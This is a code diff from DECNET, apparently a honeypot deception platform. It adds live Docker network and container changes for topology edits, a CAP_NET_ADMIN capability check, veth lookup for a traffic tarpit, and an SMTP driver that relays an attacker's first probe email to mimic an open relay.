|
||||||
|
_log.error(
|
||||||
|
"live update_decky recreate_base failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
# ------------------------------------------------------------------- ops
|
# ------------------------------------------------------------------- ops
|
||||||
|
|
||||||
|
|
||||||
@@ -131,6 +588,16 @@ async def apply_add_lan(
|
|||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Live materialisation: when the topology is active/degraded, create
|
||||||
|
# the docker bridge network now and re-render the per-topology
|
||||||
|
# compose file so subsequent ``apply_add_decky`` writes a coherent
|
||||||
|
# services map. Pending topologies skip this — the next deploy
|
||||||
|
# creates everything from scratch. Agent-pinned topologies also
|
||||||
|
# skip; live editing on agents is its own routing problem.
|
||||||
|
await _materialise_lan_change(
|
||||||
|
repo, topology_id, created=(name, subnet, is_dmz),
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -150,7 +617,17 @@ async def apply_remove_lan(
|
|||||||
f"LAN {lan['name']!r} is the home LAN of decky "
|
f"LAN {lan['name']!r} is the home LAN of decky "
|
||||||
f"{d['decky_config']['name']!r}; remove the decky first"
|
f"{d['decky_config']['name']!r}; remove the decky first"
|
||||||
)
|
)
|
||||||
await repo.delete_lan(lan["id"])
|
lan_name = lan["name"]
|
||||||
|
# enforce_pending=False: the mutator queue is the live-editing
|
||||||
|
# surface, gated on topology status by us before we got here. The
|
||||||
|
# repo's pending-only guard is for HTTP CRUD callers that mustn't
|
||||||
|
# bypass it.
|
||||||
|
await repo.delete_lan(lan["id"], enforce_pending=False)
|
||||||
|
|
||||||
|
# Live materialisation symmetric to apply_add_lan: tear down the
|
||||||
|
# docker bridge and re-render compose so a future redeploy doesn't
|
||||||
|
# try to wire deckies into a network that no longer exists.
|
||||||
|
await _materialise_lan_change(repo, topology_id, removed=lan_name)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -204,11 +681,12 @@ async def apply_add_decky(
|
|||||||
if forwards_l3:
|
if forwards_l3:
|
||||||
decky_config["forwards_l3"] = True
|
decky_config["forwards_l3"] = True
|
||||||
|
|
||||||
|
services_list = list(payload.get("services", []))
|
||||||
decky_uuid = await repo.add_topology_decky(
|
decky_uuid = await repo.add_topology_decky(
|
||||||
{
|
{
|
||||||
"topology_id": topology_id,
|
"topology_id": topology_id,
|
||||||
"name": name,
|
"name": name,
|
||||||
"services": list(payload.get("services", [])),
|
"services": services_list,
|
||||||
"decky_config": decky_config,
|
"decky_config": decky_config,
|
||||||
"x": payload.get("x"),
|
"x": payload.get("x"),
|
||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
@@ -223,6 +701,25 @@ async def apply_add_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: spawn the new decky's containers without
|
||||||
|
# touching siblings. Skips on pending / agent-pinned topologies —
|
||||||
|
# see _live_topology_or_none.
|
||||||
|
spawned = await _materialise_decky_spawn(
|
||||||
|
repo, topology_id, name, services_list,
|
||||||
|
)
|
||||||
|
# Flip the row's state to 'running' on success so the dashboard's
|
||||||
|
# ACTIVE DECKIES count reflects reality. Without this the row
|
||||||
|
# stays at the default 'pending' forever; the deployer's full
|
||||||
|
# post-deploy reconcile only runs on a fresh deploy_topology.
|
||||||
|
if spawned:
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(decky_uuid, {"state": "running"})
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live add_decky: state flip to running failed "
|
||||||
|
"topology=%s decky=%s: %s",
|
||||||
|
topology_id, name, exc,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -286,6 +783,16 @@ async def apply_attach_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: SDK network.connect on the base container.
|
||||||
|
# Service containers share the base's netns via network_mode:
|
||||||
|
# service:<base>, so they inherit the new interface — only the base
|
||||||
|
# needs the connect.
|
||||||
|
await _materialise_decky_connect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
ipv4_address=ip,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -329,7 +836,15 @@ async def apply_detach_decky(
|
|||||||
await repo.update_topology_decky(
|
await repo.update_topology_decky(
|
||||||
decky["uuid"], {"decky_config": new_cfg}
|
decky["uuid"], {"decky_config": new_cfg}
|
||||||
)
|
)
|
||||||
await repo.delete_topology_edge(edge["id"])
|
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
|
||||||
|
# Live materialisation: SDK network.disconnect on the base
|
||||||
|
# container. Service containers automatically lose visibility into
|
||||||
|
# the LAN because they share the base's netns.
|
||||||
|
await _materialise_decky_disconnect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -340,7 +855,15 @@ async def apply_remove_decky(
|
|||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
await repo.delete_topology_decky(decky["uuid"])
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
services_list = list(decky.get("services") or [])
|
||||||
|
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
|
||||||
|
# Live materialisation: stop + rm -f the decky's containers. We
|
||||||
|
# capture decky_name + services BEFORE the delete so the helper
|
||||||
|
# has the targets even though the row is gone.
|
||||||
|
await _materialise_decky_remove(
|
||||||
|
repo, topology_id, decky_name, services_list,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -354,31 +877,136 @@ async def apply_update_decky(
|
|||||||
``patch`` — dict merged into existing ``decky_config``.
|
``patch`` — dict merged into existing ``decky_config``.
|
||||||
``services`` — replacement top-level services list.
|
``services`` — replacement top-level services list.
|
||||||
``x``,``y`` — layout coords.
|
``x``,``y`` — layout coords.
|
||||||
|
``force`` — opt-in for destructive recreates (currently
|
||||||
|
required when ``forwards_l3`` flips on a
|
||||||
|
live topology — see below).
|
||||||
|
|
||||||
|
Live materialisation strategy:
|
||||||
|
|
||||||
|
* **services changed** → diff old vs new; ``compose up -d`` for
|
||||||
|
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
|
||||||
|
direct API path (services_live) without coupling.
|
||||||
|
* **forwards_l3 flipped** → port publishing changes, which docker
|
||||||
|
can only apply at container-create time. Requires recreating
|
||||||
|
the base — destructive (kills in-container state, drops active
|
||||||
|
sessions). Gated on ``payload['force'] is True``; otherwise we
|
||||||
|
raise ``MutationError`` so a half-thinking operator doesn't
|
||||||
|
stomp a live decky.
|
||||||
|
* **only coords (x/y)** → DB-only. No docker work.
|
||||||
"""
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
hydrated = await _hydrated(repo, topology_id)
|
||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
|
|
||||||
|
# Capture pre-state so we can compute the diff after the DB write.
|
||||||
|
old_services = list(decky.get("services") or [])
|
||||||
|
old_cfg = decky.get("decky_config") or {}
|
||||||
|
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
|
||||||
|
|
||||||
patch: dict[str, Any] = {}
|
patch: dict[str, Any] = {}
|
||||||
|
new_decky_config = old_cfg
|
||||||
if payload.get("patch"):
|
if payload.get("patch"):
|
||||||
merged = dict(decky["decky_config"])
|
new_decky_config = {**old_cfg, **payload["patch"]}
|
||||||
merged.update(payload["patch"])
|
patch["decky_config"] = new_decky_config
|
||||||
patch["decky_config"] = merged
|
new_services = old_services
|
||||||
if "services" in payload:
|
if "services" in payload:
|
||||||
patch["services"] = list(payload["services"])
|
new_services = list(payload["services"])
|
||||||
|
patch["services"] = new_services
|
||||||
for key in ("x", "y"):
|
for key in ("x", "y"):
|
||||||
if key in payload:
|
if key in payload:
|
||||||
patch[key] = payload[key]
|
patch[key] = payload[key]
|
||||||
if not patch:
|
if not patch:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
|
||||||
|
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
|
||||||
|
|
||||||
|
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
|
||||||
|
# 'gateway' semantic specifically means 'host-port publisher facing
|
||||||
|
# the DMZ' — running it on an internal LAN publishes ports the
|
||||||
|
# outside world can't reach and shadows the host's port space.
|
||||||
|
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
|
||||||
|
# the generator/attach paths, not by this op, so this check only
|
||||||
|
# fires when the operator explicitly toggles the flag.
|
||||||
|
if forwards_l3_flipped and new_forwards_l3:
|
||||||
|
# Re-derive the home LAN from the edges; same logic as
|
||||||
|
# check_gateway_homed_in_dmz.
|
||||||
|
decky_uuid = decky["uuid"]
|
||||||
|
home_lan_id: Optional[str] = None
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
if home_lan_id is None:
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
home_lan = next(
|
||||||
|
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
|
||||||
|
None,
|
||||||
|
)
|
||||||
|
if home_lan is None or not home_lan.get("is_dmz"):
|
||||||
|
home_name = home_lan["name"] if home_lan else "(unknown)"
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot promote decky {decky['decky_config']['name']!r} "
|
||||||
|
f"to gateway: home LAN {home_name!r} is not a DMZ. "
|
||||||
|
"Move the decky to the DMZ first, or pick a different decky."
|
||||||
|
)
|
||||||
|
|
||||||
|
# Pre-check the destructive flip BEFORE any DB write, so a refused
|
||||||
|
# mutation leaves zero side-effects.
|
||||||
|
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
|
||||||
|
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
|
||||||
|
raise MutationError(
|
||||||
|
f"forwards_l3 flip on live decky "
|
||||||
|
f"{decky['decky_config']['name']!r} requires force=true; "
|
||||||
|
"this will recreate the base container and drop in-container state"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_topology_decky(decky["uuid"], patch)
|
await repo.update_topology_decky(decky["uuid"], patch)
|
||||||
|
|
||||||
|
# Materialisation — only when the topology is actually live.
|
||||||
|
# _live_topology_or_none was already called above; calling the
|
||||||
|
# individual helpers re-checks (cheap) so they stay self-contained.
|
||||||
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
added = sorted(set(new_services) - set(old_services))
|
||||||
|
removed = sorted(set(old_services) - set(new_services))
|
||||||
|
if added or removed:
|
||||||
|
await _materialise_decky_services_diff(
|
||||||
|
repo, topology_id, decky_name, added, removed,
|
||||||
|
)
|
||||||
|
if forwards_l3_flipped:
|
||||||
|
# force was checked above; reaching here means the operator
|
||||||
|
# opted in. recreate_base re-renders compose first so the
|
||||||
|
# rebuilt base picks up the new `ports:` block.
|
||||||
|
await _materialise_decky_recreate_base(
|
||||||
|
repo, topology_id, decky_name,
|
||||||
|
)
|
||||||
|
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
async def apply_update_lan(
|
async def apply_update_lan(
|
||||||
repo: Any, topology_id: str, payload: dict[str, Any]
|
repo: Any, topology_id: str, payload: dict[str, Any]
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Update LAN fields — subnet, is_dmz, coords, rename."""
|
"""Update LAN fields — subnet, is_dmz, coords, rename.
|
||||||
|
|
||||||
|
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
|
||||||
|
Live deckies bind to the bridge with IPs allocated from the old
|
||||||
|
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
|
||||||
|
flag, which docker can't change on a network with active
|
||||||
|
containers). Reject those mutations on active/degraded topologies
|
||||||
|
rather than rewriting the DB into an incoherent state.
|
||||||
|
|
||||||
|
Coord-only updates (``x``/``y``) are layout-only; let them through
|
||||||
|
unconditionally. Renames pass through too — the bridge's docker
|
||||||
|
name is keyed off ``_network_name(topology_id, lan_name)``, so a
|
||||||
|
rename would also need a rebuild — but rename isn't currently a
|
||||||
|
code path on active topologies; if the operator hits it we still
|
||||||
|
write the row and let the next deploy reconcile.
|
||||||
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
hydrated = await _hydrated(repo, topology_id)
|
||||||
lan = _lan_by_name(hydrated, payload["name"])
|
lan = _lan_by_name(hydrated, payload["name"])
|
||||||
if lan is None:
|
if lan is None:
|
||||||
@@ -389,6 +1017,17 @@ async def apply_update_lan(
|
|||||||
fields[key] = payload[key]
|
fields[key] = payload[key]
|
||||||
if not fields:
|
if not fields:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
is_live = bool(topology) and topology.status in ("active", "degraded")
|
||||||
|
if is_live:
|
||||||
|
hostile = {"subnet", "is_dmz"} & fields.keys()
|
||||||
|
if hostile:
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot change {sorted(hostile)} on a deployed LAN; "
|
||||||
|
f"teardown + redeploy required"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_lan(lan["id"], fields)
|
await repo.update_lan(lan["id"], fields)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|||||||
@@ -151,11 +151,20 @@ def _ensure_network(
|
|||||||
options.update(extra_options)
|
options.update(extra_options)
|
||||||
|
|
||||||
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
|
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
|
||||||
|
# networks.list() doesn't populate Containers — reload to get the
|
||||||
|
# full inspect payload (including connected container IDs).
|
||||||
|
try:
|
||||||
|
net.reload()
|
||||||
|
except docker.errors.APIError:
|
||||||
|
pass
|
||||||
|
|
||||||
if net.attrs.get("Driver") == driver:
|
if net.attrs.get("Driver") == driver:
|
||||||
# Same driver — but if the IPAM pool drifted (different subnet,
|
# Same driver — but if the IPAM pool drifted (different subnet,
|
||||||
# gateway, or ip-range than this deploy asks for), reusing it
|
# gateway, or ip-range than this deploy asks for), reusing it
|
||||||
# hands out addresses from the old pool and we race the real LAN.
|
# hands out addresses from the old pool and we race the real LAN.
|
||||||
# Compare and rebuild on mismatch.
|
# Compare and rebuild on mismatch — but only when no containers
|
||||||
|
# are attached. With active endpoints Docker refuses the remove
|
||||||
|
# with 403; just attach to the existing network instead.
|
||||||
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
|
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
|
||||||
cur = pools[0] if pools else {}
|
cur = pools[0] if pools else {}
|
||||||
if (
|
if (
|
||||||
@@ -164,8 +173,15 @@ def _ensure_network(
|
|||||||
and cur.get("IPRange") == ip_range
|
and cur.get("IPRange") == ip_range
|
||||||
):
|
):
|
||||||
return # right driver AND matching pool, leave it alone
|
return # right driver AND matching pool, leave it alone
|
||||||
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live
|
if net.attrs.get("Containers"):
|
||||||
# containers first so `remove()` doesn't refuse with ErrNetworkInUse.
|
# Active endpoints — can't safely rebuild. Attach to the
|
||||||
|
# existing network; IPAM drift on ip_range only affects
|
||||||
|
# Docker's auto-assign pool, which DECNET doesn't use
|
||||||
|
# (IPs are always set explicitly in the compose file).
|
||||||
|
return
|
||||||
|
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
|
||||||
|
# Disconnect any live containers first so `remove()` doesn't
|
||||||
|
# refuse with ErrNetworkInUse.
|
||||||
for cid in (net.attrs.get("Containers") or {}):
|
for cid in (net.attrs.get("Containers") or {}):
|
||||||
try:
|
try:
|
||||||
net.disconnect(cid, force=True)
|
net.disconnect(cid, force=True)
|
||||||
@@ -303,11 +319,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
|
|||||||
# Host-side macvlan interface (hairpin fix)
|
# Host-side macvlan interface (hairpin fix)
|
||||||
# ---------------------------------------------------------------------------
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
def _require_root() -> None:
|
# Linux capability bit positions — see capabilities(7).
|
||||||
if os.geteuid() != 0:
|
_CAP_NET_ADMIN = 12
|
||||||
raise PermissionError(
|
|
||||||
"MACVLAN host-side interface setup requires root. Run with sudo."
|
|
||||||
)
|
def _has_cap_net_admin() -> bool:
|
||||||
|
"""True if the current process holds CAP_NET_ADMIN in its effective set.
|
||||||
|
|
||||||
|
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
|
||||||
|
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
|
||||||
|
bit 12 is CAP_NET_ADMIN.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
with open("/proc/self/status", "r") as fh:
|
||||||
|
for line in fh:
|
||||||
|
if line.startswith("CapEff:"):
|
||||||
|
bits = int(line.split()[1], 16)
|
||||||
|
return bool(bits & (1 << _CAP_NET_ADMIN))
|
||||||
|
except OSError:
|
||||||
|
pass
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def _require_net_admin() -> None:
|
||||||
|
"""Reject early if the process can't run ``ip link add ... macvlan``.
|
||||||
|
|
||||||
|
CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
|
||||||
|
of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
|
||||||
|
but not necessary. Prefer the cap check so the systemd unit's
|
||||||
|
``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
|
||||||
|
whole API to run as root.
|
||||||
|
"""
|
||||||
|
if os.geteuid() == 0 or _has_cap_net_admin():
|
||||||
|
return
|
||||||
|
raise PermissionError(
|
||||||
|
"MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
|
||||||
|
"Either run as root or grant the cap (systemd: "
|
||||||
|
"AmbientCapabilities=CAP_NET_ADMIN)."
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
||||||
@@ -317,7 +366,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
host-helper first: the two drivers can share a parent NIC on paper but
|
host-helper first: the two drivers can share a parent NIC on paper but
|
||||||
leaving the opposite helper in place is just cruft after a driver swap.
|
leaving the opposite helper in place is just cruft after a driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -332,7 +383,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -344,7 +395,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
host-helper first so a prior macvlan deploy doesn't leave its slave
|
host-helper first so a prior macvlan deploy doesn't leave its slave
|
||||||
dangling on the parent NIC after the driver swap.
|
dangling on the parent NIC after the driver swap.
|
||||||
"""
|
"""
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
|
|
||||||
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -358,7 +411,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
|||||||
|
|
||||||
|
|
||||||
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
||||||
_require_root()
|
_require_net_admin()
|
||||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
||||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||||
|
|
||||||
@@ -378,3 +431,47 @@ def ips_to_range(ips: list[str]) -> str:
|
|||||||
strict=False,
|
strict=False,
|
||||||
)
|
)
|
||||||
return str(network)
|
return str(network)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Container veth resolution (for tc netem tarpit)
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def get_container_pid(container_name: str) -> int:
|
||||||
|
"""Return the PID of a running container's init process."""
|
||||||
|
client = docker.from_env()
|
||||||
|
try:
|
||||||
|
container = client.containers.get(container_name)
|
||||||
|
except docker.errors.NotFound:
|
||||||
|
raise LookupError(f"container {container_name!r} not found")
|
||||||
|
pid = container.attrs["State"]["Pid"]
|
||||||
|
if not pid:
|
||||||
|
raise LookupError(f"container {container_name!r} is not running (PID=0)")
|
||||||
|
return pid
|
||||||
|
|
||||||
|
|
||||||
|
def get_container_veth(container_name: str) -> str:
|
||||||
|
"""Return the host veth interface name paired to container_name's eth0.
|
||||||
|
|
||||||
|
Reads /sys/class/net/eth0/iflink from inside the container to get the
|
||||||
|
peer interface index, then matches it against ``ip link show`` on the host.
|
||||||
|
Requires no nsenter and no elevated privileges beyond what Docker exec grants.
|
||||||
|
"""
|
||||||
|
result = _run(
|
||||||
|
["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
|
||||||
|
check=False,
|
||||||
|
)
|
||||||
|
if result.returncode != 0:
|
||||||
|
raise LookupError(
|
||||||
|
f"container {container_name!r} not reachable: {result.stderr.strip()}"
|
||||||
|
)
|
||||||
|
peer_index = result.stdout.strip()
|
||||||
|
links = _run(["ip", "link", "show"])
|
||||||
|
for line in links.stdout.splitlines():
|
||||||
|
if line.startswith(f"{peer_index}:"):
|
||||||
|
# Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
|
||||||
|
iface = line.split(":")[1].strip().split("@")[0]
|
||||||
|
return iface
|
||||||
|
raise LookupError(
|
||||||
|
f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
|
||||||
|
)
|
||||||
|
|||||||
@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
|
|||||||
try:
|
try:
|
||||||
from decnet.orchestrator.emailgen.scheduler import EmailAction
|
from decnet.orchestrator.emailgen.scheduler import EmailAction
|
||||||
except ImportError: # pragma: no cover - scheduler always exists
|
except ImportError: # pragma: no cover - scheduler always exists
|
||||||
EmailAction = None # type: ignore[assignment]
|
EmailAction = None # type: ignore[assignment, misc]
|
||||||
if EmailAction is not None and isinstance(action, EmailAction):
|
if EmailAction is not None and isinstance(action, EmailAction):
|
||||||
from decnet.orchestrator.drivers.email import EmailDriver
|
from decnet.orchestrator.drivers.email import EmailDriver
|
||||||
return EmailDriver()
|
return EmailDriver()
|
||||||
|
|||||||
@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
|
|||||||
"""Convenience accessor for telemetry / logging."""
|
"""Convenience accessor for telemetry / logging."""
|
||||||
return self._llm.model
|
return self._llm.model
|
||||||
|
|
||||||
async def run(self, action: EmailAction) -> ActivityResult:
|
async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
|
||||||
return await self._run_email(action)
|
return await self._run_email(action)
|
||||||
|
|
||||||
async def _run_email(self, action: EmailAction) -> ActivityResult:
|
async def _run_email(self, action: EmailAction) -> ActivityResult:
|
||||||
|
|||||||
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
80
decnet/orchestrator/drivers/smtp_relay.py
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
"""SMTP probe-relay driver.
|
||||||
|
|
||||||
|
Forwards the attacker's first probe email via the master's real internet
|
||||||
|
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
|
||||||
|
the master (where this worker runs) does.
|
||||||
|
|
||||||
|
Called by the realism worker's smtp probe listener, not the main tick loop.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import email
|
||||||
|
import smtplib
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
|
||||||
|
|
||||||
|
|
||||||
|
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
|
||||||
|
"""Return body with a From: header added if one is absent."""
|
||||||
|
try:
|
||||||
|
msg = email.message_from_bytes(body)
|
||||||
|
except Exception:
|
||||||
|
return body
|
||||||
|
if msg["From"]:
|
||||||
|
return body
|
||||||
|
# Prepend the header before the existing content.
|
||||||
|
header_line = f"From: {mail_from}\r\n".encode()
|
||||||
|
return header_line + body
|
||||||
|
|
||||||
|
|
||||||
|
def forward_probe(
|
||||||
|
*,
|
||||||
|
svc_cfg: dict[str, Any],
|
||||||
|
stored_as: str,
|
||||||
|
decky_name: str,
|
||||||
|
mail_from: str,
|
||||||
|
rcpt_to: list[str],
|
||||||
|
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
|
||||||
|
) -> tuple[bool, str]:
|
||||||
|
"""Read the .eml from disk and forward it via the upstream relay.
|
||||||
|
|
||||||
|
Returns (True, "") on success or (False, reason) on failure.
|
||||||
|
Always safe to call in a thread — uses only blocking I/O.
|
||||||
|
"""
|
||||||
|
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
|
||||||
|
if not upstream_host:
|
||||||
|
return False, "upstream_host not configured"
|
||||||
|
|
||||||
|
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
|
||||||
|
try:
|
||||||
|
body = eml_path.read_bytes()
|
||||||
|
except OSError as exc:
|
||||||
|
return False, f"cannot read eml: {exc}"
|
||||||
|
|
||||||
|
if not rcpt_to:
|
||||||
|
return False, "no recipients"
|
||||||
|
|
||||||
|
upstream_port = int(svc_cfg.get("upstream_port") or 25)
|
||||||
|
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
|
||||||
|
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
|
||||||
|
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
|
||||||
|
|
||||||
|
# Ensure the message has a From: header so mail clients show the attacker's
|
||||||
|
# address rather than falling back to the envelope sender (upstream_sender).
|
||||||
|
# Minimal relay-test scripts often omit headers entirely.
|
||||||
|
body = _ensure_from_header(body, mail_from)
|
||||||
|
|
||||||
|
try:
|
||||||
|
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
|
||||||
|
conn.ehlo()
|
||||||
|
if conn.has_extn("STARTTLS"):
|
||||||
|
conn.starttls()
|
||||||
|
conn.ehlo()
|
||||||
|
if upstream_user and upstream_pass:
|
||||||
|
conn.login(upstream_user, upstream_pass)
|
||||||
|
conn.sendmail(envelope_from, rcpt_to, body)
|
||||||
|
return True, ""
|
||||||
|
except Exception as exc:
|
||||||
|
return False, str(exc)[:256]
|
||||||
@@ -18,11 +18,8 @@ or IP can't escape into a shell.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
import shlex
|
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
from datetime import datetime
|
||||||
import base64
|
|
||||||
from datetime import datetime, timezone
|
|
||||||
|
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
